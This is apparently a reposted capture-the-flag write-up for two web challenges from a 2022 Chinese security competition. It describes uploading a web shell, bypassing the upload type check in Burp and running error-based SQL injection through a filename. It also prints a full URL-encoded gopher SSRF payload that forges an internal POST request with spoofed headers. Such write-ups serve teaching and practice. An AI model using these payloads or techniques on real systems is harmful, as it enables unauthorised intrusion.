当前位置:网站首页>2022 2nd cyber edge cup cyber security competition Web
2022 2nd cyber edge cup cyber security competition Web
2022-07-27 21:58:00 【web18224617243】
2022 The second cyber blade cup cyber security competition -Web
Preface
Tips : This content consists of night blade TEOT team - Master original , No plagiarism !
One 、Web2-upload
The difficulty coefficient :4.0
Title Description : Only unexpected , No, I can't ,sql yyds. See the attachment for the title link , Each link can be accessed , Environmental Science 5 Minutes to restart .
Upload files , Just upload a horse


Use Burp Grab the bag


According to the prompt , Change type

Upload files

Query to filename Upload point , An error injection , obtain FLAG


flag{5937a0b90b5966939cccd369291c68aa}
Two 、Web3-Sign_in
The difficulty coefficient :3.0
Title Description : Fried chicken simple sign in question , You have a good time ~~~~ See the attachment for the title link , Each link can be accessed , Environmental Science 5 Minutes to restart .
adopt ARP To record WEB Address
IP: 172.73.24.100

After step-by-step prompts, the final structure Payload obtain FLAG.

Payload:
http://124.220.9.19:20001/?
url=gopher://172.73.24.100:80/_POST%2520%252Findex.php%253Fa%253Dflag%2520HTTP%2 52F1.1%250D%250AHost%253A%2520172.73.24.100%250D%250AContent-
Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent- Length%253A%252011%250D%250AX-FORWARDED-
FOR%253A%2520127.0.0.1%250D%250AREFERER%3A%20bolean.club%250D%250A%250D%250Ab%25 3Dflag%250D%250A

- flag{Have_A_GoOd_T1m3!!!}
边栏推荐
- Station B collapsed. What did the developer responsible for the repair do that night?
- 递归/回溯刷题(上)
- Software testing interview question: what is the focus of unit testing, integration testing, and system testing?
- How can anyone ask how MySQL archives data?
- Software testing interview question: what is regression testing?
- [question 24] logic closed loop (Beijing Institute of Technology / Beijing University of Technology / programming methods and practice / primary school)
- 2019Q4内存厂商营收排名:三星下滑5%,仅SK海力士、美光维持增长
- 学完4种 Redis 集群方案要多久?我一口气给你说完
- 2021-11-05类变量和类方法的理解
- Excalidraw:很好用的在线、免费「手绘」虚拟白板工具
猜你喜欢

What is eplato cast by Plato farm on elephant swap? Why is there a high premium?

Monitor the running of server jar and restart script

Microsoft store can't download apps, vs2019 can't download plug-ins solution

腾讯云[HiFlow】| 自动化 -------HiFlow:还在复制粘贴?
![[question 21] idiom Solitaire (Beijing Institute of Technology / Beijing University of Technology / programming methods and practice / primary school)](/img/dd/5ef46cff3988db57bfaf6fe925a0e0.jpg)
[question 21] idiom Solitaire (Beijing Institute of Technology / Beijing University of Technology / programming methods and practice / primary school)

深入理解递归的方法调用(含实例迷宫问题、汉诺塔、猴子吃桃、斐波拉契、阶乘))

零钱通项目(两个版本)含思路详解

Exception -exception

LInkedList底层源码

Openai issued a document to introduce the latest application of Dall · E 2: fully enter the field of artistic creation and design
随机推荐
深入理解递归的方法调用(含实例迷宫问题、汉诺塔、猴子吃桃、斐波拉契、阶乘))
QT take out the input box string, lineedit
软件测试面试题:软件测试项目从什么时候开始?为什么?
V2.x synchronization is abnormal. There are a lot of posts that cannot be synchronized in the cloud, and the synchronization is blocked and slow
Cocoapods reload
自研5G芯片商用推迟?未来4年苹果iPhone都将采用高通5G芯片
软件测试面试题:通过画因果图来写测试用例的步骤为___、___、___、___及把因果图转换为状态图共五个步骤。 利用因果图生成测试用例的基本步骤是?
Commercial delay of self-developed 5g chip? Apple iPhone will adopt Qualcomm 5g chip in the next four years
LInkedList底层源码
@The difference between Autowired annotation and @resource annotation
Huawei establishes global ecological development department: fully promote HMS global ecological construction
Form of objects in memory & memory allocation mechanism
For 3nm and below processes, ASML new generation EUV lithography machine exposure
Mask automatic update description file (mask description file)
How can anyone ask how MySQL archives data?
Software test interview question: when saving a text file under windows, a save dialog box will pop up. If a test case is established for the file name, how should equivalent classes be divided?
[numerical analysis exercise] numerical integration (complex trapezoid, complex Simpson, Romberg integral) C with STL implementation
The US Department of justice added 16 new charges against Huawei, including stealing trade secrets
8000字讲透OBSA原理与应用实践
腾讯云[HiFlow】| 自动化 -------HiFlow:还在复制粘贴?